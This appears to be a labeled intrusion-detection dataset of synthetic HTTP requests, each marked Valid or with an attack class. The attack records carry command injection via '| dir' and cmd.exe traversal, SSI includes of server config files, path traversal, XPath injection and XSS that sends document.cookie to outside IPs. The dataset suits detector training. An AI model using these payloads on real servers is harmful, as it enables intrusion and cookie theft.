class: Valid
PUT /cTLOSFyWqLmsQRYrH/u7IE.css? HTTP/1.1
Content-Length: 193
Content-Language: e3yL,e,ze71fOn
Content-Encoding: deflate
Content-Location: http://www.iw9g.net/seyuezo/tadaE.rar
Content-MD5: b2VoaWxhbmF0c1J0eWFuYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Feb 06 14:32:40 UTC
Last-Modified: Thu, 29 Jul 04 11:38:20 UTC
Host: www.abaehpio1y.de:80
Connection: umnee
Accept: application/*;q=0.9, video/quicktime;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eC-ja, Yl-eewmojn, aot-sslrH, Te-Irsl
Cache-Control: max-age=22251
Client-ip: 226.93.8.242
Cookie: sqa=956;48from-G= nhs;no=nna;udusr@e9xlAr8=msf+
Cookie2: $Version="6"
Date: Wed, 05 May 04 12:58:37 UTC
ETag: "7CfSOWX-WuxMsP_N"
Expect: 100-continue
From: eHtrAtry@rnairt.fr
If-Modified-Since: Fri, 29 Aug 08 14:54:56 CET
If-Unmodified-Since: Wed, 05 Mar 08 10:22:33 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM dWJubHNhV2V3dGluZWRyYmFYenFxZWdZZWNpZDMxYUZyb2Rqbg==
Authorization: Basic bjFpbjpkMTV0ZVRN
Range: 594453-,90-83016,710615-38453
Referer: http://ewhnrn.be/dhrnaog/icsH/mlUl/nraadIi/oigthq.png
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: evng (a0Z@4N; a8TMX-R1X-)
UA-CPU: 68000
UA-Disp: 259,453,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 443x583
Via: 1.9 www.aAeti4.htm, 6.1 77.194.93.124, HTTP/4.0 245.240.138.153
Transfer-Encoding: deflate
Upgrade: duhc1d/2.7, efNnL/5.9, iitden/5.4
Warning: 738 www.zase.gif "hert7tmelrjsoLsceh" "Sat, 03 Sep 05 11:57:22 CET"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

csoseghsnpj2=sinu8aseh4esZeeeo&1lsTAau=se7stdinnc6tf Ieeati7ac&eyeene74TolvLa=rb0qSoH8&gLwss3Lndqit=oazP1n1&innI=0464668&t5eiglre=mi&gas=shutdown&yftyc%jlibeciAo+Nne&wert=qsWbe&mKntB=nwgo

End - Id: 7008
Start - Id: 42816
class: OsCommanding
PUT /ikCPPQFk@utf/stylehH7XamV/PJX1.0.mspx? HTTP/1.0
Content-Length: 312
Content-Language: fxcr,ooa
Content-Encoding: identity
Content-Location: http://www.enojekdd.st/ce5if/8gdO/tNoGesC/sSldoC.png
Content-MD5: aWhuMXVlNGhxb21JY2dkdw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jun 09 14:16:13 UTC
Last-Modified: Wed, 23 May 07 02:23:16 GMT
Host: www.btehhoiys.cz:25
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: 7r7-un;q=0.1, coytepac-cne
Cache-Control: no-cache
Client-ip: 3.250.89.30
Cookie: Ndmv=r;tyrohzc=iptvvyu
Cookie2: $Version="5"
Date: Sat, 20 Nov 04 23:07:17 CET
ETag: "DpzBK@3z5lqS4vlaus"
If-Modified-Since: Sun, 05 Mar 06 06:48:36 UTC
If-Unmodified-Since: Tue, 18 Aug 09 19:48:14 GMT
If-Match: "Ko3ikK-moe7XWzx"
If-None-Match: *
If-Range: *
Max-Forwards: 9400
Proxy-Authorization: Digest nonce
Authorization: Basic c2hvc2JvMDpuYXRo
Referer: http://www.pie8yn.it/achxba.txt
User-Agent: rheestAn5 (tCLKSM904c; se_Pzy; hhparq)
UA-Pixels: 0367x479
Via: tea/7.8 www.hcw1e.jpeg:774, 5.4 13.146.50.252, 6.8 www.rltNa.png
Transfer-Encoding: identity
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ateeirzlti=qUOt&nI=etnolFr73p2uehr&ael=557&efeHF4jlyAtiehn=rlAsnKrnI@&O8pDEiKe=70&oe6oTe3p=6.71.30.248 | dir&tamznhhimusneda==varfIeta@A y&iDnaeoenNEfaThU=262&tf74i=4elshsontkEoi&a2aem=w\9rb&jinoxi=adminatwgetw&jcnal0xwwraWst=rr%mCeo:tAn7&ix=efi&8OVdocumentX@=tik&oinnopfLb=ap0Brtcmeta1wboot.inicec

End - Id: 42816
Start - Id: 44490
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Lucaus.org
Connection: ptdOe
Accept: */*
Accept-Charset: utf-8, x-mac-arabic;q=0.7, windows-1254, iso-8859-1;q=0.8
Accept-Encoding: 
Accept-Language: tpsm0e-Oc4rH3n;q=0.4, oagwUrc-n84en;q=0.2, 5feusnia-qc7eiiiu;q=0.8, n-Sa;q=0.5, eu-dic
Cache-Control: no-store
Client-ip: 20.163.26.161
Cookie: osgazerughwcu=nxsxzRHAGbdP;2e=18173305;ah62obctel=tbAJJAfT4zMN
Cookie2: $Version="7"
Date: Fri, 21 Oct 05 01:07:25 GMT
ETag: W/"eRpmRkmZ96ktFwtKx"
Expect: 100-continue
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: *
If-None-Match: "fL9Ds4t2N0K6y1wPIcml"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 998
MIME-Version: 9.7
Pragma: i=eftw
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: stacy7 2feono=dnha
Range: -80,3-,-9028
Referer: /Imsse/eEg6n/ehejcbk/b8ns/lsarf2.png
TE: gzip,trailers
Trailer: Via
User-Agent: yfoXmT.1 http://www.TesN.com
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 949x9593
Via: o4u/8.8 www.sriy.css:42353, ennsme/1.0 www.Z4csn.tiff
Transfer-Encoding: compress
Upgrade: tNaw/6.0, n1eien/5.5, iol/1.2, Rlt5/6.0
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44490
Start - Id: 31186
class: Valid
GET /HGC-IM/ipOL0fEw7/iONleZnFBbX-cOq/cemj1teoog3bilnf57w/4octhwseLanoreeruAsi/tKXcmdrmhnA79/42sknhjerz/eoF_4rXcGXJ/dWqW@WD4.bin?oeehCerejYj=+t1lpe&r8mn=8549986&ach=hsXaYLYp-o&Sfe=oEBX&vbo3nah0beuxk=3&hUZT@7=sdsEcmtbHoCprrEehb&moEtane=et+cunele&iontefnvoep5=ilibou+e&tlLhhstt=cn%5Dcw++fe%26httpnl1n%40ecmd%3BD&y6tomeasiheeeTp=915298727&faa5=99807027&ruaanbjD7nt=nph-bnullieaOxitia7fd&tErf56eey1s4=2h&eetny=sttfe&dwuuh8=iaZi8egn2w-D HTTP/1.1
Host: www.ishlwn1Abl.be
Connection: nipta
Accept: application/*
Accept-Charset: windows-1254;q=0.3, x-mac-greek;q=0.8, hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=57
Client-ip: 45.22.98.14
Cookie: x6oi2inart=odJXGqn0k;aarqor=93287392;et=ehznode;2ox4aeAodmlinxw=306533;dhr8taornu=452
Cookie2: $Version="19"
Date: Sat, 22 Jan 05 03:25:44 GMT
ETag: W/"OR8rN3ifRxFoSfh@FN"
Expect: 100-continue
From: 2pun@ildgulxsU.uk
If-Modified-Since: Wed, 01 Oct 08 05:46:43 GMT
If-Unmodified-Since: Wed, 06 May 09 05:11:21 UTC
If-Match: *
If-None-Match: "Ee9BY8Rrd52Kwm4pd8"
If-Range: "@bnvwcIxEHXwQMg"
Max-Forwards: 784
MIME-Version: 1.1
Pragma: Dmsoal=1aihrt
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: ctTp aEEckmc=a1trp
Range: 487-253698,1-,198-1
Referer: /6ewjwr/Uegue/m9eieota.png
TE: trailers,chunked;q=0.9
Trailer: Expect
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 0.6; bi-mm; rv:7.7.7) Gecko/26548118
UA-CPU: StrongARM
UA-Disp: 056,6829,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3376x378
Via: 7.7 63.28.63.5, 2.0 87.33.179.35
Transfer-Encoding: gzip
Upgrade: brmCe/3.7, du9/1.2, int/6.8, n1wopd/2.2
Warning: 628 7.107.154.223 "19aoiihha" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 251100
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31186
Start - Id: 39861
class: SSI
PUT /gKJCeRvX43Iwe_7gLX/eMl3kenPn/9HtUxR4/TsurpeeDnEsseaotmg/ftsecaaaereiai.pl? HTTP/1.0
Content-Length: 28
Content-Language: rsoa,yd,oe
Content-Encoding: gzip
Content-Location: http://www.kneeuo.org/notlpsUn/lero2e/Hr3z9s/twiaS.rar
Content-MD5: aDltZTJ3UGZ0RWpycnZ0dA==
Content-Type: application/x-www-form-urlencoded
Host: 131.126.22.193
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: iso-8859-3;q=0.3, us-ascii, gb2312;q=0.9
Accept-Language: nfriUro-and;q=0.9, agnDutCd-so6yt6od;q=0.7
Cache-Control: max-age=235
Cookie: rasznerra=o>wet~eitsol;i8lnseucuede=<!--     #include  virtual="/etc/httpd/httpd.conf"    -->;7ce1itLrNprerg=PTcbi
Date: Thu, 20 Aug 09 05:10:16 UTC
ETag: W/"kG1@TsvVgLQf3SDsr_B@"
If-Modified-Since: Sat, 05 Nov 05 21:36:07 UTC
Proxy-Authorization: Digest nonce
Referer: /tmeoero/pe7e.pl
Trailer: Accept-Charset
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 5.9; ps-lg; rv:2.5.0) Gecko/03227819
UA-OS: Solaris
Via: 8.1 155.38.199.33, nyxyt8/3.4 www.lretceoo.html
Transfer-Encoding: g1tr
Warning: 870 95.84.114.177 "g09giai" "Tue, 15 Nov 05 23:42:04 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IefhpL=5&nee52arttiheuTt=563

End - Id: 39861
Start - Id: 5399
class: Valid
POST /Omae5sd/86l@ALG.jpeg? HTTP/1.1
Content-Length: 205
Content-Language: d2,s,yOehohly
Content-Encoding: compress
Content-Location: /we54E/4npp/eaee781e.swf
Content-MD5: dXN1YXVveHJlc250ZWR1Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Nov 05 09:22:35 CET
Last-Modified: Mon, 15 Jan 07 13:35:03 GMT
Host: www.rs7Rf5h0.cz
Connection: keep-alive
Accept: video/quicktime, image/jpeg;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: compress, identity;q=0.3
Accept-Language: lboeoel-s8a;q=0.3, StAriua-win
Cache-Control: no-cache
Client-ip: 49.138.242.29
Cookie: iweta59hn=868824;c0nrE4aahaei=select27boot.inie's\node5%window.open gf) f2
Cookie2: $Version="20"
Date: Sun, 26 Aug 07 21:14:45 GMT
ETag: "Yvs2zOQ_Wa5zcsw"
Expect: uools=kenw;bnaue4
From: heif@92m3ed.fr
If-Modified-Since: Tue, 02 Jan 07 10:17:25 CET
If-Unmodified-Since: Sun, 10 Apr 05 11:26:37 GMT
If-Match: "NQBokgsdNGLa51rKg4"
If-None-Match: ".x-KqWpVN-MsP2vt"
If-Range: Mon, 09 Feb 09 21:09:24 CET
Max-Forwards: 614
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: sgjr Elepaa=Eepe
Authorization: Digest nc=A147a833
Range: 18375-6599,-64,09092-
Referer: http://ldggi.uk/uttf/6smif.js
TE: gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/4.5 (X11; U; Unix 0.0; s4-ec; rv:0.2.6) Gecko/01990215
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 237x186
Via: HTTP/2.5 www.rncypi8.shtml, FTP/2.1 www.dtCsn.html, 4.4 243.206.160.219:94411
Transfer-Encoding: identity
Upgrade: t4mc/3.8
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5iTohejfotDuta=vrREacuuw5e&v7deletemocha7rmsA=ra7&Easujs=ls&r3hermyrtedmgr=j0lrateSS&re=si&g3xnhnnubxetlea=2791&-rRE-GgbqLZbetween=uoz tlop0@abhe-&pfsx3ahii=3484965490&1AchildlibkmadminbT@=ribORA/wd8n1

End - Id: 5399
Start - Id: 2948
class: Valid
GET /tfiDCExYHNYjjFsww_/oct0s7aaleo.css?rwiateoabtD=bW.Ni&eacMt=rlgc&Tieaudcx=3i4etsm9ns24ie5d&rnndoio8et=7408&.dincludekxV.7She=aeznHedocumentd&7Y@Lpassthru@0F=+%3Dsdhde6j&YaAi11=aWbnjfMGLeuO&naorenttqpeae=zt6r&mt33dgwuhehhd=gqqgzEgJ&kVscriptechojO.j=a8vrIvhnnhe&cr9us4a9dj=a&eda=0055947522 HTTP/1.1
Host: 109.211.167.13
Connection: UbirI
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 169.197.153.152
Cookie: rrtijoii8eronk=bcZJu8;lS3trteidcac=5066734
Cookie2: $Version="800"
Date: Tue, 03 Apr 07 22:17:06 GMT
ETag: "kqymBXwIb4BDZBZzH"
Expect: 100-continue
From: Iohco@rBgrnzg.net
If-Modified-Since: Wed, 22 Aug 07 18:21:34 UTC
If-Unmodified-Since: Thu, 22 Jan 09 21:08:09 GMT
If-Match: *
If-None-Match: "hFwHHEy@83-FhZO"
If-Range: Sat, 03 Oct 09 09:57:11 CET
Max-Forwards: 3763
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="si4s"
Authorization: Digest uri=http://dmLuuscn.gov/eiesatn/Aonlesl/tHDtrtt/iaeRb.png
Range: 88640-9956,7533-4307
Referer: http://www.laOhpeo.st/tneblit/neg8nfra/Ahhc.pl
TE: deflate,chunked
Trailer: Date
User-Agent: Mozilla/8.7 (X11; U; SunOS sun4u 7.3; t8-es; rv:3.3.1) Gecko/69131252
UA-CPU: StrongARM
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8247x2505
Via: HTTP/5.6 www.reeoirks.jpeg:8190
Transfer-Encoding: patuse; L7onr=ltaaet
Upgrade: Diah/3.5, rn3tnm/4.9, a5emrt/3.5, ic7/0.5, aehi/9.7
Warning: 909 147.139.214.46 "xasxjoeuPm2r3W" 
X-Forwarded-For: 251.157.153.85
X-Serial-Number: 1920071
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2948
Start - Id: 47774
class: XSS
GET /leyhhpzeoyrC/DMwt49ksystem83replace.bin?emSSDfairhvi=5846&iieshed=n&rnkiThss0enca=%3E&JGJ-=f47%24&eRyItejet=%3Ca+++href++++%3D++%22about%3A%3Cs%26%2399%3Bript++%3E%5Bwindow.open%28%27http%3A%2F%2F43.104.22.66%2Fromeis.exe%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+++%22+++%3E&inuzaOnEunA0hn=017356635&poHc=891&srndws=%25ua%28-etnno4nnqtdiframean&v9i=OehneBe&4etodtrlOnojntq=ea%5Cr%5D6%29nctde&rtpn=425573860&Gx_in=ei9earzatfa&5h1hsaHreve=reinmailnetcateq HTTP/1.1
Host: www.uisR.it:351
Connection: blertsle
Accept: */*
Accept-Charset: hz-gb-2312;q=0.9, x-mac-hebrew, iso-8859-3
Accept-Encoding: identity;q=0.9, gzip
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 225.168.147.79
Cookie: 2elc=dcw
Cookie2: $Version="49"
Date: Sat, 12 Jan 08 21:40:19 UTC
ETag: W/"Nxww7jHnVW6-iC@KeH"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Sun, 27 Dec 09 02:22:34 CET
If-Unmodified-Since: Sun, 13 Dec 09 24:37:39 CET
If-Match: "58voER346VsT_GDZiHbx"
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 67
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic ZWliYmFyeGU6aVI4Ym9yYg==
Range: 2672-661117
Referer: http://gn3o.org/hm0beet/ornlaleE/egdeEnni/3sds/usrDe9A.mp3
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 6.8; el-td; rv:7.2.0) Gecko/51682429
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 9.1 www.eTrrb.htm
Transfer-Encoding: gzip
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 631 www.kssI.html "8aanadrIs23e" "Sun, 29 Oct 06 08:10:03 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47774
Start - Id: 40377
class: SSI
GET /r8zxq/oVRq-0l0wjzRtjDO5K/yZdU6/eoomioaata/eoRO6qopiDgu49F/leGiy3TL/rTqb6B.png?TnullUSOgB5P=qspvfaj&KfAH@C=bML-GxKBh%40&vonSZWL1a=bidne&ssezo5N4u=6eenvhhdte0hbraTl&lalrdSua=ub&lM=alleAo&dmOnoshiaueenda=t8ZmyepT&mX4a8En=1&lm=slc%25owtwes HTTP/1.1
Host: www.fip1s.biz
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-cyrillic, cp-950, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: T-s;q=0.4, uecy6eu-h, gryut7ir-Miiglaio;q=0.9, ls-aprd;q=0.8, etodsre-sTaaD;q=0.4
Cache-Control: max-stale=50
Client-ip: 54.76.160.189
Cookie: riYoswq7Hea=ellqfAeaqohineme;otilsiehFihraw=eGsAy;nsdqdikcquattlw=ebost>;c0vwd=<!--     #include   virtual="d:\windows\autoexec.bat" -->;1lpc=e\dnph-Au%u slaan ;;fdatncana=els)uvwhere
Cookie2: $Version="768"
Date: Mon, 03 Oct 05 21:31:26 UTC
ETag: W/"6Lmjudpd27dTA12kd"
Expect: 100-continue
If-Modified-Since: Fri, 27 May 05 08:23:32 CET
If-Unmodified-Since: Wed, 16 Aug 06 03:03:17 UTC
If-Match: *
If-None-Match: "qeB.-c8JT1LEmLOt.q."
If-Range: Mon, 09 Jan 06 04:16:48 GMT
Max-Forwards: 1
Pragma: rabntlah=mt7fi
Proxy-Authorization: Basic enJ0dG5TN3Q6YWlpbGFjYmQ=
Authorization: Digest nc=B993EAfA
Range: 96-,55-506,03-
Referer: http://www.ehnl.uk/taicmUt/uhaomds.dll
TE: gzip
Trailer: Date
User-Agent: ap1WOo http://www.tc8hn.com
UA-Disp: 1230,8979,32
UA-Pixels: 1566x5651
Via: 9.2 1.213.221.182
Transfer-Encoding: LtmlNI
Warning: 856 63.36.49.224 "Zmrea1kcpbtle" 
X-Forwarded-For: 167.91.249.90

null

End - Id: 40377
Start - Id: 44920
class: PathTransversal
GET /9CTWydlzd3t-./hiTRLy2brxxp_H7/h1cAndabvjao/tbiahso3ne2toseNefr.pl?aone=.%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.1
Host: www.ry7o.org
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Sg-li6tj, 3lxg-rhlrmnli;q=0.2
Cache-Control: no-transform
Client-ip: 156.228.249.233
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="12"
Date: Wed, 15 Feb 06 18:02:32 CET
ETag: W/"xgozFDJQuQqPl-86u-"
Expect: r1deaen
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Tue, 11 Oct 05 10:25:31 GMT
If-Unmodified-Since: Fri, 23 Jan 04 06:34:24 UTC
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: "2b967b0-Bkcc4co"
Max-Forwards: 1403
MIME-Version: 6.2
Pragma: tudElp1=sa6oeFe
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: http://www.aeedhdfa.cz/t4Mtemnt/htRuhkjr/hlonvtr/a5eejeW.dll
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/6.1 (X11; U; Linux i586 7.0; hi-de; rv:2.1.9) Gecko/81656545
UA-CPU: StrongARM
UA-Disp: 714,744,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: 5.9 www.hhequr.tiff, 4.9 126.126.41.176, 7.1 www.ststy.tiff
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 640 197.125.93.67 "pyiaiihnet7qbt" "Wed, 01 Apr 09 17:31:52 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44920
Start - Id: 48415
class: XPathInjection
GET /pq00pHJDB5FA/esmedoN0wh3rhnlpeees.mspx?bwxbztw5=N%3F9a%3B&ee=cddXIYe&qLgg67CW4T6ps=no%29%5CeOetbn5%2Fb7 HTTP/1.0
Host: 6.220.210.197
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=0362
Client-ip: 89.166.184.126
Cookie: rti08e=idEcxL']  |  P  | //user[    name/text(  )   =    'shw;onsyteosu=onozepymrDnxm
Cookie2: $Version="98"
Date: Wed, 21 Feb 07 06:37:15 GMT
ETag: W/"JA_SYP1@VUk1I4H6"
Expect: 100-continue
From: wem8si@ltOhb.biz
If-Modified-Since: Tue, 10 Aug 04 04:20:52 UTC
If-Unmodified-Since: Sun, 17 Jul 05 01:43:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.9
Pragma: oRFW=pwt
Proxy-Authorization: Digest opaque="uacst"
Authorization: NTLM c2FzcXN0ZDhlcWhzMmpvbm5laWlhb2lhanV0YW5pbGljYnJlNG9tZTdhRXR0
Range: 78647-,9158-,4840-
Referer: http://thenu8.biz/Sgtai/srwu1tel/ei1ahnid.jsp
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: sy9UCGE@rQ http://www.unyhceo0.ch
UA-CPU: MIPS
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 979x9457
Via: 8.2 www.7irteip.gif
Transfer-Encoding: identity
Upgrade: nea/7.4, eNt/9.7, lsi/6.2, 2El/8.5, hravyc/9.6
Warning: 160 191.100.5.46 "y2fbaaTltys" "Thu, 31 May 07 10:23:19 CET"
X-Forwarded-For: 200.45.80.130
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48415
Start - Id: 46471
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: 80.223.134.153
Connection: keep-alive
Accept: video/*;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 209.77.63.143
Cookie2: $Version="2"
Date: Wed, 07 Jan 09 18:32:55 CET
ETag: "TClpSRyVRpjXpah"
Expect: lrsltM
From: oeed@ro5sY.uk
If-Modified-Since: Wed, 07 Apr 10 16:36:08 UTC
If-Unmodified-Since: Mon, 14 Jul 08 21:50:10 CET
If-Match: *
If-None-Match: "KelgZwzD12KEShLkLB5"
Max-Forwards: 75
Pragma: yr7s=lslO
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: ezmfH nonhs4ah=loigeTl0
Range: -540
Referer: /hrssmrli/t4waeo/deieoypt.bin
TE: trailers,gzip
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 1.5; gd-Da; rv:6.7.7) Gecko/00180290
UA-OS: Windows 98
UA-Pixels: 920x981
Via: ela/4.6 175.235.33.7
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3

null

End - Id: 46471
Start - Id: 47749
class: XSS
GET /lotTiiN5VGPvTwf/a7KCbMBgslCQ34v.tr/akNyE3TVHSS/oUU13VihoY@lrjUNnluk/um99YfcCQADABr7/nsySuaV9EIlltrsg/Y5e3ff8iar0.jsp?assueamefchdse=hd&zO=%26%7B%5Bwindow.open%28%27http%3A%2F%2F92.34.126.170%2Fat.msf%27%2Bdocument.cookie%29%3B%5D%7D%3B&dHiqot=1764538617&zHZZcvbscriptguPpS=%7E&bformstdinXjmfALAS=jgh3&sgrimEyi4iE=aq&bd1eiispsro=10227&uAARZNZ8=n%40bKk&esm2tzits43o7=peuleitiwinntab&ocaespp=39113672&qell=%40ncytupdateis+ HTTP/1.1
Host: 176.232.119.175:885
Connection: keep-alive
Accept: application/x-tar, image/jpeg;q=0.1, video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 48.67.221.5
Cookie: eerbneUse=)asse7union2m
Cookie2: $Version="00"
Date: Sat, 20 Jan 07 22:57:56 CET
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Wed, 22 Feb 06 11:48:37 UTC
If-Unmodified-Since: Wed, 18 Nov 09 23:33:03 UTC
If-Match: "ztaZzhDtm3BqBDYbIuK"
If-None-Match: *
If-Range: Sat, 24 May 08 05:55:49 UTC
Max-Forwards: 81
MIME-Version: 7.7
Pragma: stt6=4aNi
Proxy-Authorization: NTLM cmMwdWFPOUNuckxhZHJoZmxubG92YXQ0cmFhbGloanNlbkU=
Authorization: 6lRTvt et6rdy=hgrgone
Range: -887125,6715-3229
Referer: http://www.ofhgaeo.de/rspadaee/1chTa/icusTina/0ESeeuth.mspx
TE: trailers
Trailer: Date
User-Agent: g.vfeUF http://www.atuih0n4.uk
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: 9.4 92.11.81.124
Transfer-Encoding: h5pi
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 007 99.146.164.232:6 "uilesuwut6rpu" "Thu, 10 Feb 05 15:43:00 CET"
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47749
Start - Id: 5615
class: Valid
PUT /sn__E70VAKkBUOP0rn/tieEix87gloh/os9dag3e3eyznina3ict/G0/mdbhsjs/nCF/Kprocessing-instructionlocationcatuj/cjen4q9pnxl/1dgnavl7rx5snt/ghQTZ0Ida21glZw.php? HTTP/1.0
Content-Length: 39
Content-Language: 3rnethue,j,6cte
Content-Encoding: deflate
Content-Location: http://www.tlat2a7e.biz/Dthnern4/edwloia.bin
Content-MD5: MkphdVRib3Rob2VyZXZudA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 11:05:57 GMT
Last-Modified: Sun, 08 Nov 09 01:09:52 GMT
Host: 22.226.156.60
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.9, euc-cn, windows-1254, gb2312, ks_c_5601-1987;q=0.5
Accept-Encoding: 
Accept-Language: lnet-shio;q=0.8, w-cRpnTh;q=0.5, ll-Rriei, taj-atto
Cache-Control: only-if-cached
Client-ip: 193.158.164.119
Cookie: emws=[stdinpjjesecbshi@qqS;ea=i0a0hs;eie6drzjz=0700;Ta9raehedmjt=1
Cookie2: $Version="74"
Date: Fri, 09 May 08 24:46:00 GMT
ETag: "bcRo.rDFW3u19MgT"
Expect: 100-continue
From: retom@4teeztn0w.uk
If-Modified-Since: Fri, 10 Feb 06 17:51:30 GMT
If-Unmodified-Since: Sat, 19 Feb 05 13:50:15 GMT
If-Match: *
If-None-Match: "q43J1yS75Rf1SgDTWEf"
If-Range: Wed, 12 Oct 05 20:58:16 GMT
Max-Forwards: 351
MIME-Version: 9.8
Pragma: inmJ5t=eNfoh
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: NTLM aGFhMklibHNhOW9lZ0VPM2RoRXRlYXRlN3JaWmluYmlkeG5uSHFyYmw=
Range: 67795-,06619-,662301-47622
Referer: http://wtout.uk/yeAhohQ/alits.gif
TE: gzip
Trailer: If-Modified-Since
